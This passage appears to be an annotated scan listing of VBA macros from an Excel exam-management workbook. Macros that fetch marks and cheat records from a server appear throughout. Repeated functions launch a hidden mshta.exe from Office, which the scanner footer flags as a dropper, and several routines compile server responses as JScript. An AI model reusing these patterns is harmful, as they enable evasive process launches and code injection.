' findings. The markup passed to mshta is inline "about:" content; no remote URL appears in it.
' Detection: an Office process spawning mshta.exe with a command line that starts with "about:".
Function CreateWindow()
    ' oProc is declared but not used in this function.
    Dim sSignature, oShellWnd, oProc
    ' Errors are suppressed so that the GetProperty probe below can fail quietly.
    On Error Resume Next
    ' A fresh GUID (38 characters = one braced GUID string) serves as a unique property name.
    sSignature = Left(CreateObject("Scriptlet.TypeLib").GUID, 38)
    ' Run arguments: window style 0 = hidden, False = do not wait for the process to exit.
    ' The inline page moves itself off-screen, hides from the taskbar, hosts a browser control
    ' (RegisterAsBrowser=1) and stores its own window object under the GUID property.
    CreateObject("WScript.Shell").Run "%systemroot%\syswow64\mshta.exe about:""about:<head><script>moveTo(-32000,-32000);document.title='x86Host'</script><hta:application showintaskbar=no /><object id='shell' classid='clsid:8856F961-340A-11D0-A96B-00C04FD705A2'><param name=RegisterAsBrowser value=1></object><script>shell.putproperty('" & sSignature & "',document.parentWindow);</script></head>""", 0, False
    ' Polls the shell's window list until one exposes the GUID property.
    ' The loop has no timeout or delay, so it spins indefinitely if the host never registers.
    Do
        For Each oShellWnd In CreateObject("Shell.Application").Windows
            Set CreateWindow = oShellWnd.GetProperty(sSignature)
            If Err.Number = 0 Then Exit Function
            Err.Clear
        Next
    Loop
End Function

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Opens http://<host>/Upload, with the host read from cell C19 of sheet "开始" ("Start").
' WScript.Shell.Run is given a URL rather than a program, so it is handed to whatever handler
' the system associates with it (normally the default browser).
' NOTE(review): the worksheet cell value flows unvalidated into the string passed to Run.
Sub Upload()
    IP = Sheets("开始").Range("C19").Value
    CreateObject("wscript.shell").Run "http://" & IP + "/Upload"
End Sub

Attribute VB_Name = "Sheet7"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Teacher-side routine that creates an exam on the server.
' Builds a /NewExam query from cells on sheet "教师端" ("teacher console"): name (E6),
' start (I8), end (I10) and five per-type counts (E12..E20). Sends it with GET and shows
' the text after the first ":" of the response.
' NOTE(review): no credential or token is attached to the request in this code.
Sub SetExam()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/NewExam?"
    ' Cell values are appended as-is; no URL encoding is applied.
    Url = Url & "name=" & Sheets("教师端").Range("E6").Value
    Url = Url & "&start=" & Sheets("教师端").Range("I8").Value
    Url = Url & "&end=" & Sheets("教师端").Range("I10").Value
    Url = Url & "&count0=" & Sheets("教师端").Range("E12").Value
    Url = Url & "&count1=" & Sheets("教师端").Range("E14").Value
    Url = Url & "&count2=" & Sheets("教师端").Range("E16").Value
    Url = Url & "&count3=" & Sheets("教师端").Range("E18").Value
    Url = Url & "&count4=" & Sheets("教师端").Range("E20").Value
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    ' temp(1) is read without checking that the response contained a ":".
    temp = Split(xmlhttp.ResponseText, ":")
    MsgBox Replace(temp(1), "}", "")
    Set xmlhttp = Nothing
End Sub

' Teacher-side routine that requests /DelExam on the server and shows the text after the
' first ":" of the response.
' NOTE(review): a state-changing action is issued as a GET, and no credential or token is
' attached in this code.
Sub DelExam()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/DelExam?"
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    ' temp(1) is read without checking that the response contained a ":".
    temp = Split(xmlhttp.ResponseText, ":")
    MsgBox Replace(temp(1), "}", "")
    Set xmlhttp = Nothing
End Sub

' Makes sheet "开始" ("Start") visible again.
Sub Test()
    Sheets("开始").Visible = True
End Sub

' Teacher-side routine that pulls every student's marks from /GetAllMark and writes them to
' sheet "教师端" ("teacher console"), columns M..Q, starting at row 2.
' The three per-section counts are multiplied by the values in cells I12, I14 and I16.
' NOTE(review): the HTTP response text is compiled as JScript by the ScriptControl (AddCode),
' so the server's reply is treated as code rather than parsed as data.
Sub GetAllMark()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetAllMark?"
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
    sc.AddCode ("var query = " & xmlhttp.ResponseText)
    QuestionCount = sc.Eval("query.length")
    QuestionRow = 2
    For i = 0 To QuestionCount - 1
        StudentName = sc.Eval("query[" & i & "].name")
        Studentid = sc.Eval("query[" & i & "].id")
        Studentchoice = sc.Eval("query[" & i & "].choice")
        Studentjudgment = sc.Eval("query[" & i & "].judgment")
        Studentcompletion = sc.Eval("query[" & i & "].completion")
        Sheets("教师端").Range("M" & QuestionRow).Value = StudentName
        Sheets("教师端").Range("N" & QuestionRow).Value = Studentid
        ' I12 / I14 / I16 presumably hold the points per question for each section - confirm in the workbook.
        Sheets("教师端").Range("O" & QuestionRow).Value = Studentchoice * Sheets("教师端").Range("I12").Value
        Sheets("教师端").Range("P" & QuestionRow).Value = Studentjudgment * Sheets("教师端").Range("I14").Value
        Sheets("教师端").Range("Q" & QuestionRow).Value = Studentcompletion * Sheets("教师端").Range("I16").Value
        QuestionRow = QuestionRow + 1
    Next i
End Sub

' Opens http://<host>/Download?msg=All, with the host read from cell C19 of sheet "开始" ("Start").
' WScript.Shell.Run is given a URL rather than a program, so it is handed to whatever handler
' the system associates with it (normally the default browser).
' NOTE(review): the worksheet cell value flows unvalidated into the string passed to Run.
Sub GetAllAnswer()
    IP = Sheets("开始").Range("C19").Value
    CreateObject("wscript.shell").Run "http://" & IP + "/Download?msg=All"
End Sub

' Teacher-side routine that pulls per-student "cheat" records from /GetCheat and writes them to
' sheet "教师端" ("teacher console"), columns B..F, starting at row 39.
' NOTE(review): the HTTP response text is compiled as JScript by the ScriptControl (AddCode),
' so the server's reply is treated as code rather than parsed as data.
Sub GetAllCheat()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetCheat?"
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
    sc.AddCode ("var query = " & xmlhttp.ResponseText)
    QuestionCount = sc.Eval("query.length")
    QuestionRow = 39
    For i = 0 To QuestionCount - 1
        StudentName = sc.Eval("query[" & i & "].name")
        Studentid = sc.Eval("query[" & i & "].id")
        ' The meaning of cheat1..cheat3 is not visible in this code.
        cheat1 = sc.Eval("query[" & i & "].cheat1")
        cheat2 = sc.Eval("query[" & i & "].cheat2")
        cheat3 = sc.Eval("query[" & i & "].cheat3")
        Sheets("教师端").Range("B" & QuestionRow).Value = StudentName
        Sheets("教师端").Range("C" & QuestionRow).Value = Studentid
        Sheets("教师端").Range("D" & QuestionRow).Value = cheat1
        Sheets("教师端").Range("E" & QuestionRow).Value = cheat2
        Sheets("教师端").Range("F" & QuestionRow).Value = cheat3
        QuestionRow = QuestionRow + 1
    Next i
End Sub

' Second copy of CreateObjectx86 in this listing (this one follows the Sheet7 attributes).
' Returns a COM object created inside a 32-bit host when the VBA runtime is 64-bit.
'   sProgID - ProgID to instantiate (used only in the Win64 branch).
'   bClose  - when True, closes the cached host window and returns without creating anything.
' On 32-bit VBA, sProgID is ignored and a MSScriptControl.ScriptControl is created directly.
Function CreateObjectx86(Optional sProgID, Optional bClose = False)
    ' Static: the host window reference survives between calls, so the host is started only once.
    Static oWnd As Object
    Dim bRunning As Boolean
    #If Win64 Then
        ' The host counts as alive while oWnd still reports an HTMLWindow type name.
        bRunning = InStr(TypeName(oWnd), "HTMLWindow") > 0
        If bClose Then
            If bRunning Then oWnd.Close
            Exit Function
        End If
        If Not bRunning Then
            Set oWnd = CreateWindow()
            ' Defines a VBScript function inside the host that calls CreateObject there.
            oWnd.execScript "Function CreateObjectx86(sProgID): Set CreateObjectx86 = CreateObject(sProgID): End Function", "VBScript"
        End If
        Set CreateObjectx86 = oWnd.CreateObjectx86(sProgID)
    #Else
        Set CreateObjectx86 = CreateObject("MSScriptControl.ScriptControl")
    #End If
End Function


' Second copy of CreateWindow in this listing (this one follows the Sheet7 attributes).
' Starts a hidden mshta.exe from syswow64 and returns its HTML window object.
' The markup passed to mshta is inline "about:" content; no remote URL appears in it.
' Detection: an Office process spawning mshta.exe with a command line that starts with "about:".
Function CreateWindow()
    ' oProc is declared but not used in this function.
    Dim sSignature, oShellWnd, oProc
    ' Errors are suppressed so that the GetProperty probe below can fail quietly.
    On Error Resume Next
    ' A fresh GUID (38 characters = one braced GUID string) serves as a unique property name.
    sSignature = Left(CreateObject("Scriptlet.TypeLib").GUID, 38)
    ' Run arguments: window style 0 = hidden, False = do not wait for the process to exit.
    ' The inline page moves itself off-screen, hides from the taskbar, hosts a browser control
    ' (RegisterAsBrowser=1) and stores its own window object under the GUID property.
    CreateObject("WScript.Shell").Run "%systemroot%\syswow64\mshta.exe about:""about:<head><script>moveTo(-32000,-32000);document.title='x86Host'</script><hta:application showintaskbar=no /><object id='shell' classid='clsid:8856F961-340A-11D0-A96B-00C04FD705A2'><param name=RegisterAsBrowser value=1></object><script>shell.putproperty('" & sSignature & "',document.parentWindow);</script></head>""", 0, False
    ' Polls the shell's window list until one exposes the GUID property.
    ' The loop has no timeout or delay, so it spins indefinitely if the host never registers.
    Do
        For Each oShellWnd In CreateObject("Shell.Application").Windows
            Set CreateWindow = oShellWnd.GetProperty(sSignature)
            If Err.Number = 0 Then Exit Function
            Err.Clear
        Next
    Loop
End Function
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 108032 bytes
SHA-256: 588ae4e81b4d5c232ab336efba8c26aef5078789a901524191bf2498fb004b1a
Detection
ClamAV: Doc.Dropper.Agent-6412232-1
Obfuscation or payload: unlikely